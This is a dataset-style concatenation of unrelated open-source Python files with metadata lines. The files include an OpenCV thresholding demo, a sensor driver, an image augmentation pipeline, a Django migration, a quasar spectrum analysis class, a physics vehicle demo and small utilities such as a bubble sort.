<filename>opencv_test1/demo/7.py import cv2 import numpy as np from matplotlib import pyplot as plt img = cv2.imread('/home/python/Desktop/opencv_test/samoye1.jpg', 0) ret, thresh1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY) ret, thresh2 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY_INV) ret, thresh3 = cv2.threshold(img, 127, 255, cv2.THRESH_TRUNC) ret, thresh4 = cv2.threshold(img, 127, 255, cv2.THRESH_TOZERO) ret, thresh5 = cv2.threshold(img, 127, 255, cv2.THRESH_TOZERO_INV) ret, thresh6 = cv2.threshold(img, 127, 255, 20) titles = ['Original Image', 'BINARY', 'BINARY_INV', 'TRUNC', 'TOZERO', 'TOZERO_INV', 'zidingyi'] images = [img, thresh1, thresh2, thresh3, thresh4, thresh5, thresh6] for i in range(7): plt.subplot(3, 3, i + 1), plt.imshow(images[i], 'gray') plt.title(titles[i]) plt.xticks([]), plt.yticks([]) print(cv2.THRESH_TOZERO) plt.show() # import cv2 # import numpy as np # from matplotlib import pyplot as plt # # img = cv2.imread('/home/python/Desktop/opencv_test/pic/car8.jpg', 0) # img = cv2.medianBlur(img, 5) # # ret, th1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY) # th2 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C, \ # cv2.THRESH_BINARY, 11, 2) # th3 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, \ # cv2.THRESH_BINARY, 11, 2) # # titles = ['Original Image', 'Global Thresholding (v = 127)', # 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding'] # images = [img, th1, th2, th3] # # for i in range(4): # plt.subplot(2, 2, i + 1), plt.imshow(images[i], 'gray') # plt.title(titles[i]) # plt.xticks([]), plt.yticks([]) # plt.show()
2.890625
3
haas_lib_bundles/python/docs/examples/temperature_humidity/haas506/code/gxht30.py
wstong999/AliOS-Things
0
12789697
<reponame>wstong999/AliOS-Things from driver import I2C class GXHT30(object): # init i2cDev def __init__(self,i2cObj): self.i2cObj=None if not isinstance(i2cObj,I2C): raise ValueError("parameter is not an I2C object") self.i2cObj=i2cObj # write cmd to register # commands:0x2c、0x06 def write(self,cmd1,cmd2): writeBuf=bytearray([cmd1,cmd2]) self.i2cObj.write(writeBuf,2) # read data from register # read data from :0x00 # len(data) are 6 bytes : cTemp MSB, cTemp LSB, cTemp CRC, Humididty MSB, Humidity LSB, Humidity CRC def read(self,cmd,len): readBuf=bytearray(len) readBuf[0]=cmd self.i2cObj.read(readBuf,6) return readBuf # convert the data def covert_data(self,data): cTemp = ((((data[0] * 256.0) + data[1]) * 175) / 65535.0) - 45 fTemp = cTemp * 1.8 + 32 humidity = 100 * (data[3] * 256 + data[4]) / 65535.0 return cTemp,fTemp,humidity # measure temperature and humidity def measure(self): if self.i2cObj is None: raise ValueError("invalid I2C object") self.write(0x2c,0x06) data=self.read(0x00,6) cTemp,fTemp,humidity=self.covert_data(data) return cTemp,fTemp,humidity
2.65625
3
src/augraphy/default/pipeline.py
faizan1041/augraphy
0
12789698
"""The default recommended pipeline. If you don't need to produce your own augmentations or specialized pipelines, you can use this to generate more images. """ import random from augraphy.base.paperfactory import PaperFactory from augraphy.base.oneof import OneOf from augraphy.base.augmentationsequence import AugmentationSequence from augraphy.base.augmentationpipeline import AugraphyPipeline from augraphy.augmentations.brightness import BrightnessAugmentation from augraphy.augmentations.brightnesstexturize import BrightnessTexturizeAugmentation from augraphy.augmentations.dirtyrollers import DirtyRollersAugmentation from augraphy.augmentations.dustyink import DustyInkAugmentation from augraphy.augmentations.gaussianblur import GaussianBlurAugmentation from augraphy.augmentations.inkbleed import InkBleedAugmentation from augraphy.augmentations.jpeg import JpegAugmentation from augraphy.augmentations.lightinggradient import LightingGradientAugmentation from augraphy.augmentations.lowinkblobs import LowInkBlobsAugmentation from augraphy.augmentations.lowinkperiodiclines import LowInkPeriodicLinesAugmentation from augraphy.augmentations.lowinkrandomlines import LowInkRandomLinesAugmentation from augraphy.augmentations.noisetexturize import NoiseTexturizeAugmentation from augraphy.augmentations.subtlenoise import SubtleNoiseAugmentation def default_augraphy_pipeline(): ink_phase = AugmentationSequence([ InkBleedAugmentation(), DustyInkAugmentation(), LowInkBlobsAugmentation(), OneOf([ LowInkRandomLinesAugmentation(use_consistent_lines=False), LowInkRandomLinesAugmentation(use_consistent_lines=True), LowInkPeriodicLinesAugmentation(use_consistent_lines=False), LowInkPeriodicLinesAugmentation(use_consistent_lines=True), ]), GaussianBlurAugmentation('ink', p=1) ]) paper_phase = AugmentationSequence([PaperFactory(), OneOf([ AugmentationSequence([ NoiseTexturizeAugmentation(p=1.0), BrightnessTexturizeAugmentation(), GaussianBlurAugmentation('paper', [(3,3), (3,5), (5,3), (5,5)]), ]), AugmentationSequence([ BrightnessTexturizeAugmentation(p=1.0), NoiseTexturizeAugmentation(), GaussianBlurAugmentation('paper', [(3,3), (3,5), (5,3), (5,5)]), ])]), BrightnessAugmentation('paper') ]) post_phase = AugmentationSequence([DirtyRollersAugmentation(p=0.0), OneOf([ LightingGradientAugmentation(), BrightnessAugmentation('post') ]), SubtleNoiseAugmentation(), JpegAugmentation() ]) return AugraphyPipeline(ink_phase, paper_phase, post_phase)
1.726563
2
demo/profiles/migrations/0001_initial.py
jdavidagudelo/django-userena-ce
86
12789699
# Generated by Django 3.0.5 on 2020-04-01 20:15 import django.db.models.deletion import easy_thumbnails.fields from django.conf import settings from django.db import migrations, models import userena.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name="Profile", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ( "mugshot", easy_thumbnails.fields.ThumbnailerImageField( blank=True, help_text="A personal image displayed in your profile.", upload_to=userena.models.upload_to_mugshot, verbose_name="mugshot", ), ), ( "privacy", models.CharField( choices=[ ("open", "Open"), ("registered", "Registered"), ("closed", "Closed"), ], default="registered", help_text="Designates who can view your profile.", max_length=15, verbose_name="privacy", ), ), ( "language", models.CharField( choices=[ ("en", "English"), ("nl", "Dutch"), ("fr", "French"), ("pl", "Polish"), ("pt", "Portugese"), ("pt-br", "Brazilian Portuguese"), ("es", "Spanish"), ("el", "Greek"), ("zh-hans", "Simplified Chinese"), ("zh-hant", "Traditional Chinese"), ], default="en", help_text="Default language.", max_length=8, verbose_name="language", ), ), ("website", models.URLField(blank=True, verbose_name="website")), ( "location", models.CharField( blank=True, max_length=255, verbose_name="location" ), ), ( "birth_date", models.DateField(blank=True, null=True, verbose_name="birth date"), ), ("about_me", models.TextField(blank=True, verbose_name="about me")), ( "user", models.OneToOneField( on_delete=django.db.models.deletion.CASCADE, related_name="profile", to=settings.AUTH_USER_MODEL, verbose_name="user", ), ), ], options={ "permissions": (("view_profile", "Can view profile"),), "abstract": False, "default_permissions": ("add", "change", "delete"), }, ), ]
1.789063
2
src/cashier/purchase/container.py
artdotlis/Cashier
0
12789700
<reponame>artdotlis/Cashier # -*- coding: utf-8 -*- """A module providing global data containers.""" from dataclasses import dataclass from decimal import Decimal from typing import final @final @dataclass class PurchasedItem: """A container describing the purchased item.""" imported: bool """Whether the item is imported or not.""" name: str """The name of the item.""" price: Decimal """The price of the item.""" cnt: int """The amount of the items to purchase.""" taxed: bool """Describes whether the basic sales taxes should be applied."""
2.21875
2
kafkaapi.py
MarkWh1te/mysql2kafka
1
12789701
# -*- coding: utf-8 -*- from kafka import KafkaProducer class Kafka(object): def __init__(self,servers,zookeeper=None): self.zookeeper = zookeeper self.producer = KafkaProducer(bootstrap_servers=servers) def send(self,topic,data): future = self.producer.send( topic, data ) results = future.get() return results
2.5
2
penygader/plotting/publication.py
Cadair/penygader
0
12789702
<filename>penygader/plotting/publication.py<gh_stars>0 # -*- coding: utf-8 -*- """ Created on Mon Dec 3 16:24:02 2012 @author: <NAME> This module imports matplotlib with customisations I use when creating figures for inclusion in print publications. Usage ----- >>> from penygader.plotting.publication import * >>> plt.plot(x,y) >>> thick_ticks(plt.gca()) >>> plt.show() """ import matplotlib as mpl #Do rcParams bit mpl.rcParams['axes.linewidth'] = 1.7 mpl.rcParams['xtick.major.pad'] = 7 mpl.rcParams['ytick.major.pad'] = 5 mpl.rcParams['font.family'] = 'serif' mpl.rcParams['font.serif'] = ['Time New Roman'] mpl.rcParams.update({'font.size': 15}) import matplotlib.pyplot as plt __all__ = ['mpl', 'plt', 'thick_ticks', 'tex_fonts'] def tex_fonts(): mpl.rcParams['ps.useafm'] = True mpl.rcParams['pdf.use14corefonts'] = True mpl.rcParams['text.usetex'] = True def thick_ticks(ax): for line in ax.yaxis.get_ticklines(minor=True) + ax.xaxis.get_ticklines(minor=True): line.set_markersize(4.5) line.set_markeredgewidth(1) for line in ax.yaxis.get_ticklines() + ax.xaxis.get_ticklines(): line.set_markersize(7) line.set_markeredgewidth(1.5)
2.59375
3
podpy/Spectrum.py
turnerm/podpy
0
12789703
<gh_stars>0 """ podpy is an implementatin of the pixel optical depth method as described in Turner et al. 2014, MNRAS, 445, 794, and Aguirre et al. 2002, ApJ, 576, 1. Please contact the author (<NAME>) at <EMAIL> if you have any questions, comment or issues. """ import numpy as np import scipy.interpolate as intp import matplotlib.pyplot as plt from astropy.io import fits import os ### import universe as un import Pod class Spectrum: """ Creates a spectrum object. Parameters ---------- z_qso: float Redshift of the quasar object_name: str Name of the object, important for locating relevant files filepath: str, optional The directory tree leading to the flux, error array and mask files mask_badreg: boolean, optional Whether bad regions should be manually masked using a file provided by the user. The file should have the format filepath + object_name + "_badreg.mask", and contain two tab-separated text columns, where each row contains the start and end wavelength of a region to mask. mask_dla: boolean, optional Same as mask_badreg, except for masking DLAs, and the file should be named filepath + objecta_name + '_dla.mask'. verbose: boolean, optional Instance attributes ---------- lambdaa: wavelength in angstroms flux: normalized flux array sigma_noise: error array npix: length of the above arrays """ BAD_NOISE = -1 # Value to set bad pixels to def __init__(self, z_qso, object_name, filepath = "", mask_badreg = False, mask_dla = False, verbose = True): print "\n*** Getting spectrum ***" self.z_qso = z_qso self.object_name = object_name self.filepath = filepath self.mask_badreg = mask_badreg self.mask_dla = mask_dla self.verbose = verbose def mask_spectrum(self): """ Search for mask files and apply the mask if they exist """ if self.mask_badreg or self.mask_dla: mask_filepath = self.filepath + self.object_name mask_type_list = [] if self.mask_badreg: mask_type_list.append("badreg") if self.mask_dla: mask_type_list.append("dla") if self.verbose: print "Looking for mask files..." for mask_type in mask_type_list: mask_file = mask_filepath + "_" + mask_type + ".mask" if os.path.isfile(mask_file): print "...found", mask_type, "file" data = np.loadtxt(mask_file) if len(data.shape) == 1: data = [data] for row in data: mask_region_idx = np.where((self.lambdaa >= row[0]) & (self.lambdaa <= row[1])) self.sigma_noise[mask_region_idx] = Spectrum.BAD_NOISE else: if self.verbose: print "...WARNING: no", mask_type, "file found" def prep_spectrum(self): """ Prepares the spectrum before implementing POD by setting up the flag array that keeps track of bad / corrected pixels, and setting up the optical depth arrays and functions. """ # Flag regions where spectrum is no good (noise <= 0) # and set noise to -1 exactly for consistency in interpolation self.flag = np.zeros(self.npix, dtype = int) bad_pix = np.where(self.sigma_noise <= 0) self.sigma_noise[bad_pix] = Spectrum.BAD_NOISE self.flag[bad_pix] = Pod.Pod.FLAG_DISCARD # Set the flux to tau_min since they are bad regions, should not have signal self.flux[bad_pix] = 1.0 # Prepare the functions for interpolating self.flux_function = self.interp_f_lambda(self.lambdaa, self.flux) self.sigma_noise_function = self.interp_f_lambda(self.lambdaa,self.sigma_noise) negflux = (self.flux <= 0) self.tau = np.where(negflux, Pod.Pod.TAU_MAX, -np.log(self.flux)) self.tau_function = self.interp_f_lambda(self.lambdaa, self.tau) @staticmethod def interp_f_lambda(lambdaa, f_lambda): """ Linearly interpolates a function of lambda Parameters ---------- lambdaa: array_like Wavelength array. f_lambda: array_like Whichever quantity is a function of the wavelength. Returns ------- f: function of wavelength """ return intp.interp1d(lambdaa, f_lambda, kind='linear') def get_tau_rec_h1(self, **kwargs): """ Get the optical depth of HI, returned as an object named self.h1. Parameters ---------- label: str, optional Adds a label to the object that is attached to the spectrum. e.g., label = "_A" would result in an object named "h1_A". See Pod class for remaining input parameters. """ name = "h1" + kwargs.pop("label", "") vars(self)[name] = Pod.LymanAlpha(self, **kwargs) def get_tau_rec_ion(self, ion, *args, **kwargs): """ Get the optical depth of ion $ion, returned as an object named self.$ion Parameters ---------- ion: str Currently supported: c2, c3, c4, n5, o1, o6, si2, si3, si4 label: str, optional Adds a label to the object that is attached to the spectrum. e.g., label = "_A" would result in an object named "$ion_A". See Pod class for remaining input parameters. """ name = ion + kwargs.pop("label", "") tau_rec = Pod.Metal(self, ion, *args, **kwargs) vars(self)[name] = tau_rec def get_tau_rec_c2(self,**kwargs): """ Get the optical depth of CII using the fiducial recovery parameters: correct_h1 = False correct_self = False take_min_doublet = False Returns an object named self.c2. See Pod class for optional input parameters. """ self.get_tau_rec_ion("c2", 0, 0, 0, **kwargs) def get_tau_rec_c3(self, **kwargs): """ Get the optical depth of CIII using the fiducial recovery parameters: correct_h1 = True correct_self = False take_min_doublet = False Returns an object named self.c3. See Pod class for optional input parameters. """ self.get_tau_rec_ion("c3", 1, 0, 0, **kwargs) def get_tau_rec_c4(self, **kwargs): """ Get the optical depth of CIV using the fiducial recovery parameters: correct_h1 = False correct_self = True take_min_doublet = False Returns an object named self.c4. See Pod class for optional input parameters. """ self.get_tau_rec_ion("c4", 0, 1, 0, **kwargs) def get_tau_rec_n5(self, **kwargs): """ Get the optical depth of NV using the fiducial recovery parameters: correct_h1 = False correct_self = False take_min_doublet = True Returns an object named self.n5. See Pod class for optional input parameters. """ self.get_tau_rec_ion("n5", 0, 0, 1, **kwargs) def get_tau_rec_o1(self, **kwargs): """ Get the optical depth of OI using the fiducial recovery parameters: correct_h1 = False correct_self = False take_min_doublet = False Returns an object named self.o1. See Pod class for optional input parameters. """ self.get_tau_rec_ion("o1", 0, 0, 0, **kwargs) def get_tau_rec_o6(self, **kwargs): """ Get the optical depth of OVI using the fiducial recovery parameters: correct_h1 = True correct_self = False take_min_doublet = True Returns an object named self.o6. See Pod class for optional input parameters. """ self.get_tau_rec_ion("o6", 1, 0, 1, **kwargs) def get_tau_rec_si2(self, **kwargs): """ Get the optical depth of SiII using the fiducial recovery parameters: correct_h1 = False correct_self = False take_min_doublet = False Returns an object named self.si2. See Pod class for optional input parameters. """ self.get_tau_rec_ion("si2", 0, 0, 0, **kwargs) def get_tau_rec_si3(self, **kwargs): """ Get the optical depth of SiIII using the fiducial recovery parameters: correct_h1 = False correct_self = False take_min_doublet = False Returns an object named self.si3. See Pod class for optional input parameters. """ self.get_tau_rec_ion("si3", 0, 0, 0, **kwargs) def get_tau_rec_si4(self, **kwargs): """ Get the optical depth of SiIV using the fiducial recovery parameters: correct_h1 = False correct_self = False take_min_doublet = True Returns an object named self.si4. See Pod class for optional input parameters. """ self.get_tau_rec_ion("si4", 0, 0, 1, **kwargs) def fit_continuum(self, bin_size = 20.0, n_cf_sigma = 2.0, max_iterations = 20): """ Automatically re-fit the continuum redward of the QSO Lya emission in order to homogenize continuum fitting errors between different quasars """ if self.verbose: print "Fitting continuum..." # Set up the area to fit lambda_min = (1.0 + self.z_qso) * un.lambda_h1[0] index_correction = np.where(self.lambdaa > lambda_min)[0] if len(index_correction) == 0: sys.exit("No pixels redward of LyA!") lambdaa = self.lambdaa[index_correction] flux = self.flux[index_correction].copy() sigma_noise = self.sigma_noise[index_correction].copy() flag = self.flag[index_correction].copy() # Get the bins bin_size = bin_size * (1. + self.z_qso) lambda_max = lambdaa[-1] nbins = np.floor((lambda_max - lambda_min) / bin_size) nbins = int(nbins) bin_size = (lambda_max - lambda_min) / nbins if self.verbose: print "...using", nbins, "bins of", bin_size, "A" bin_edges = lambda_min + np.arange(nbins + 1) * bin_size pixels_list = [None] * nbins lambda_centre = np.empty(nbins) for i in range(nbins): pixels_list[i] = np.where((lambdaa > bin_edges[i]) & (lambdaa <= bin_edges[i+1]))[0] lambda_centre[i] = bin_edges[i] + bin_size / 2. # Throw this all into a while loop until convergence flag_interp = flag.copy() flux_interp = flux converged = 0 medians = np.empty(nbins) medians_flag = np.zeros(nbins, dtype=int) niter = 0 lambda_interp = lambda_centre medians_interp = np.empty(nbins) while converged == 0 and niter < max_iterations: niter += 1 for i in range(nbins): pixels = pixels_list[i] lambda_bin = lambdaa[pixels] flux_bin = flux[pixels] medians[i] = np.median(flux_bin[flag_interp[pixels] % 2 == 0]) if (np.isnan(medians[i])): medians_flag[i] = 1 for i in range(nbins): if medians_flag[i] == 1: medians[i] = medians[(i-1) % nbins] medians_interp = medians # Interpolate flux_function = intp.splrep(lambda_interp, medians_interp, k = 3) flux_interp = intp.splev(lambdaa, flux_function) flag_interp_new = flag.copy() bad_pix = np.where((flux_interp - flux) > n_cf_sigma * sigma_noise)[0] flag_interp_new[bad_pix] = 1 # Test for convergence if (flag_interp_new == flag_interp).all(): converged = 1 flag_interp = flag_interp_new # Divide out the spectrum in the fitted part self.flux_old = self.flux.copy() self.sigma_noise_old = self.sigma_noise.copy() bad_pix = np.where(flag % 2 == 1) flux_interp[bad_pix] = flux[bad_pix] self.flux[index_correction] = flux / flux_interp self.sigma_noise[index_correction] = sigma_noise / flux_interp self.flux_function = self.interp_f_lambda(self.lambdaa, self.flux) self.sigma_noise_function = self.interp_f_lambda(self.lambdaa, self.sigma_noise) if self.verbose: print "...done\n" def plot_spectrum(self): """ Quick view plot of QSO spectrum """ fig, ax = plt.subplots(figsize = (12, 3)) ax.plot(self.lambdaa, self.flux, lw = 0.5, c = 'b') ax.plot(self.lambdaa, self.sigma_noise, lw = 0.5, c = 'r') ax.axhline(y = 0, ls = ':', c = 'k', lw = 0.5) ax.axhline(y = 1, ls = ':', c = 'k', lw = 0.5) ax.set_ylim(-0.2, 1.2) ax.set_xlabel("$\lambda$ [\AA]") ax.set_ylabel("Normalized flux") ax.minorticks_on() fig.show() class KodiaqFits(Spectrum): """ Createa spectrum from KODIAQ fits files. The flux file and error array, respectively, should be located in the files: filepath + objectname + _f.fits filepath + objectname + _e.fits """ def __init__(self, z_qso, object_name, **kwargs): Spectrum.__init__(self, z_qso, object_name, **kwargs) # Read in flux file flux_filepath = self.filepath + object_name + "_f.fits" flux_file = fits.open(flux_filepath)[0] self.flux = flux_file.data # Get wavelength array crpix1 = flux_file.header['CRPIX1'] # reference pixel crval1 = flux_file.header['CRVAL1'] # coordinate at reference pixel cdelt1 = flux_file.header['CDELT1'] # coordinate increment per pixel length = flux_file.header['NAXIS1'] self.lambdaa = 10**((np.arange(length) + 1.0 - crpix1) * cdelt1 + crval1) self.npix = length # Read in error file err_filepath = self.filepath + object_name + "_e.fits" err_file = fits.open(err_filepath)[0] self.sigma_noise = err_file.data # Mask any bad regions or dlas self.mask_spectrum() # Prep spectrum self.prep_spectrum() print "*** Done ***\n" class UserInput(Spectrum): """ Create a spectrum from user input. Unlike the KodiaqFits class, here the flux, wavelength and noise arrays need to be dirrectly supplied. Parameters ---------- lambdaa: wavelength in angstroms flux: normalized flux array sigma_noise: error array """ def __init__(self, z_qso, object_name, lambdaa, flux, sigma_noise, **kwargs): Spectrum.__init__(self, z_qso, object_name, **kwargs) self.flux = flux self.sigma_noise = sigma_noise self.lambdaa = lambdaa self.npix = len(lambdaa) # Mask any bad regions or dlas self.mask_spectrum() # Prep spectrum self.prep_spectrum() print "*** Done ***\n"
2.65625
3
examples/vehicle.py
20tab/pybulletphysics
21
12789704
<reponame>20tab/pybulletphysics from bulletphysics import * broadphase = DbvtBroadphase() collisionConfiguration = DefaultCollisionConfiguration() dispatcher = CollisionDispatcher(collisionConfiguration) solver = SequentialImpulseConstraintSolver() world = DiscreteDynamicsWorld(dispatcher, broadphase, solver,collisionConfiguration) world.setGravity( Vector3(0, -10, 0) ) ground = BoxShape(Vector3(1000, 10, 1000)) chassis = BoxShape(Vector3(10, 10, 20)); ground_motionstate = DefaultMotionState( Transform(Quaternion(0,0,0,1), Vector3(0,-50,0)) ) ground_rigidbody_info = RigidBodyConstructionInfo(0, ground_motionstate, ground, Vector3(0,0,0)) ground_rigidbody = RigidBody(ground_rigidbody_info) world.addRigidBody(ground_rigidbody) ground_rigidbody.name = "ground" chassis_motionstate = DefaultMotionState( Transform(Quaternion(0,0,0,1), Vector3(0, 60,0)) ) chassis_mass = 100 local_inertia = Vector3(0,0,0) chassis.calculateLocalInertia(chassis_mass, local_inertia) chassis_rigidbody_info = RigidBodyConstructionInfo(chassis_mass, chassis_motionstate, chassis, local_inertia) chassis_rigidbody = RigidBody(chassis_rigidbody_info) chassis_rigidbody.name = "chassis" tuning = VehicleTuning() raycaster = DefaultVehicleRaycaster(world) vehicle = RaycastVehicle(tuning, chassis_rigidbody, raycaster) print vehicle world.addRigidBody(chassis_rigidbody) chassis_rigidbody.setActivationState(4) world.addAction(vehicle) vehicle.setCoordinateSystem(0, 1, 2) # back left (0) vehicle.addWheel(Vector3(-10, -4.5, -19), Vector3(0,-1, 0), Vector3(-1, 0, 0), 0.6, 6, tuning, False) # back right (1) vehicle.addWheel(Vector3(10, -4.5, -19), Vector3(0, -1, 0), Vector3(-1, 0, 0), 0.6, 6, tuning, False) # front left (2) vehicle.addWheel(Vector3(-10, -4.5, 19), Vector3(0, -1, 0), Vector3(-1, 0, 0), 0.6, 6, tuning, True) # front right (3) vehicle.addWheel(Vector3(10, -4.5, 19), Vector3(0, -1, 0), Vector3(-1, 0, 0), 0.6, 6, tuning, True) chassis_trans = Transform() for i in range(0, 300): vehicle.setSteeringValue(0, 2) vehicle.setSteeringValue(0, 3) vehicle.applyEngineForce(1000, 0) vehicle.applyEngineForce(1000, 1) vehicle.setBrake(0, 0) vehicle.setBrake(0, 1) world.stepSimulation(1/30.0, 1) chassis_motionstate.getWorldTransform(chassis_trans) origin = chassis_trans.getOrigin() print origin.getX(), origin.getY(), origin.getZ()
2.453125
2
client/setup.py
lagudomeze/starwhale
1
12789705
<filename>client/setup.py from setuptools import setup, find_packages install_requires = open("requirements.txt").readlines() setup(name='starwhale', version="0.1.0", description='MLOps Platform', keywords="MLOps AI", url='https://github.com/star-whale/starwhale', license='Apache-2.0', packages=find_packages(exclude=['ez_setup', 'tests*']), include_package_data=True, install_requires=install_requires, zip_safe=False, entry_points=""" [console_scripts] swcli = starwhale.cli:cli starwhale = starwhale.cli:clip """, python_requires = ">=3.7.0", scripts=[ ], package_data={ }, )
1.375
1
metrics/kinetics/accuracy_metrics.py
cairensi/gesture-recognition
1
12789706
# Author by CRS-club and wizard from __future__ import absolute_import from __future__ import unicode_literals from __future__ import print_function from __future__ import division import numpy as np import datetime import logging logger = logging.getLogger(__name__) class MetricsCalculator(): def __init__(self, name, mode): self.name = name self.mode = mode # 'train', 'val', 'test' self.reset() def reset(self): logger.info('Resetting {} metrics...'.format(self.mode)) self.aggr_acc1 = 0.0 self.aggr_acc5 = 0.0 self.aggr_loss = 0.0 self.aggr_batch_size = 0 def finalize_metrics(self): self.avg_acc1 = self.aggr_acc1 / self.aggr_batch_size self.avg_acc5 = self.aggr_acc5 / self.aggr_batch_size self.avg_loss = self.aggr_loss / self.aggr_batch_size def get_computed_metrics(self): json_stats = {} json_stats['avg_loss'] = self.avg_loss json_stats['avg_acc1'] = self.avg_acc1 json_stats['avg_acc5'] = self.avg_acc5 return json_stats def calculate_metrics(self, loss, softmax, labels): accuracy1 = compute_topk_accuracy(softmax, labels, top_k=1) * 100. accuracy5 = compute_topk_accuracy(softmax, labels, top_k=5) * 100. return accuracy1, accuracy5 def accumulate(self, loss, softmax, labels): cur_batch_size = softmax.shape[0] # if returned loss is None for e.g. test, just set loss to be 0. if loss is None: cur_loss = 0. else: cur_loss = np.mean(np.array(loss)) # self.aggr_batch_size += cur_batch_size self.aggr_loss += cur_loss * cur_batch_size accuracy1 = compute_topk_accuracy(softmax, labels, top_k=1) * 100. accuracy5 = compute_topk_accuracy(softmax, labels, top_k=5) * 100. self.aggr_acc1 += accuracy1 * cur_batch_size self.aggr_acc5 += accuracy5 * cur_batch_size return # ---------------------------------------------- # other utils # ---------------------------------------------- def compute_topk_correct_hits(top_k, preds, labels): '''Compute the number of corret hits''' batch_size = preds.shape[0] top_k_preds = np.zeros((batch_size, top_k), dtype=np.float32) for i in range(batch_size): top_k_preds[i, :] = np.argsort(-preds[i, :])[:top_k] correctness = np.zeros(batch_size, dtype=np.int32) for i in range(batch_size): if labels[i] in top_k_preds[i, :].astype(np.int32).tolist(): correctness[i] = 1 correct_hits = sum(correctness) return correct_hits def compute_topk_accuracy(softmax, labels, top_k): computed_metrics = {} assert labels.shape[0] == softmax.shape[0], "Batch size mismatch." aggr_batch_size = labels.shape[0] aggr_top_k_correct_hits = compute_topk_correct_hits(top_k, softmax, labels) # normalize results computed_metrics = \ float(aggr_top_k_correct_hits) / aggr_batch_size return computed_metrics
2.328125
2
tools/SDKTool/src/ui/tree/ai_tree/action_dqn_data.py
Passer-D/GameAISDK
1,210
12789707
<filename>tools/SDKTool/src/ui/tree/ai_tree/action_dqn_data.py # -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making GameAISDK available. This source code file is licensed under the GNU General Public License Version 3. For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package. Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved. """ import logging from collections import OrderedDict from ....common.define import DQN_ACTION_TYPES, CONTACTS, AI_ACTION_TYPES from ....config_manager.ai.ai_manager import AIManager, AIAlgorithmType from .action_data import ActionData from ...utils import get_value logger = logging.getLogger("sdktool") class DqnActionData(ActionData): @staticmethod def get_game_action_inner(): return AIManager().get_game_action(AIAlgorithmType.DQN) @staticmethod def get_ai_action_inner(): return AIManager().get_ai_action(AIAlgorithmType.DQN) def game_action_extend_param(self): param = OrderedDict() out_params = OrderedDict() out_params['path'] = '' out_params['region'] = OrderedDict() out_params['region']['x'] = 0 out_params['region']['y'] = 0 out_params['region']['w'] = 0 out_params['region']['h'] = 0 param['actionRegion'] = out_params param['durationMS'] = 0 return param def get_type_param(self): out_params = OrderedDict() out_params['path'] = '' out_params['region'] = OrderedDict() out_params['region']['x'] = 0 out_params['region']['y'] = 0 out_params['region']['w'] = 0 out_params['region']['h'] = 0 return out_params def get_game_action_type_param(self): return DQN_ACTION_TYPES def init_swipe_params(self, params=None): if params is None: params = OrderedDict() swipe_param = OrderedDict() swipe_param['startX'] = get_value(params, 'startX', 0) swipe_param['startY'] = get_value(params, 'startY', 0) swipe_param['endX'] = get_value(params, 'endX', 0) swipe_param['endY'] = get_value(params, 'endY', 0) return swipe_param def new_game_action(self, action_name, game_action): action_value = OrderedDict() action_value['id'] = game_action.alloc_id() action_value['name'] = action_name action_value['contact'] = CONTACTS[0] action_value['sceneTask'] = -1 action_value['type'] = AI_ACTION_TYPES[0] return action_value
1.796875
2
app/grandchallenge/uploads/emails.py
kant/grand-challenge.org
0
12789708
from django.conf import settings from grandchallenge.core.utils.email import send_templated_email def send_file_uploaded_notification_email(**kwargs): uploader = kwargs["uploader"] challenge = kwargs["challenge"] site = kwargs["site"] title = f"[{challenge.short_name.lower()}] New Upload" admins = challenge.get_admins() if not admins: admin_email_adresses = [x[1] for x in settings.ADMINS] kwargs["additional_message"] = ( "<i> Message from COMIC: I could not\ find any administrator for " + challenge.short_name + ". Somebody needs to\ know about this new upload, so I am Sending this email to everyone set\ as general COMIC admin (ADMINS in the /comic/settings/ conf file). To\ stop getting these messages, set an admin for\ " + challenge.short_name + ".</i> <br/><br/>" ) else: kwargs["additional_message"] = "" admin_email_adresses = [x.email for x in admins] kwargs["project"] = challenge send_templated_email( title, "uploads/emails/file_uploaded_email.html", kwargs, admin_email_adresses, )
2.171875
2
ontquery/__init__.py
tmsincomb/ontquery
1
12789709
from ontquery.query import OntQuery, OntQueryCli from ontquery.terms import OntCuries, OntId, OntTerm from ontquery import plugin __all__ = ['OntCuries', 'OntId', 'OntTerm', 'OntQuery', 'OntQueryCli'] __version__ = '0.2.8'
1.210938
1
raw/files_manager.py
atoms18/BMI-prediction-from-Human-Image
3
12789710
import shutil from os import listdir from os.path import isfile, join from pathlib import Path outlier_files = {f for f in listdir("outlier") if isfile(join("outlier", f))} raw_outlier_files = {Path(f).stem + ".jpg" for f in listdir("raw_outlier_datasets/") if isfile(join("raw_outlier_datasets/", f))} move_files = outlier_files - raw_outlier_files print(raw_outlier_files) #for file in move_files: # shutil.move("outlier/"+Path(file).stem+".png", "outlier/nude/"+Path(file).stem+".png")
2.8125
3
problems/bubble-sort/bubble-sort.py
vidyadeepa/the-coding-interview
1,571
12789711
<reponame>vidyadeepa/the-coding-interview def bubblesort(l): """ Runtime: O(n^2) """ last = len(l)-1 for i in range(last): for j in range(i+1, last): if l[i] > l[j]: l[i], l[j] = l[j], l[i] return l print bubblesort([8,2,4,7,9,0,1,4,5,7,8,9]) print bubblesort([]) print bubblesort([1]) print bubblesort([1,3])
3.875
4
diyclock.py
parttimehacker/diyclock
0
12789712
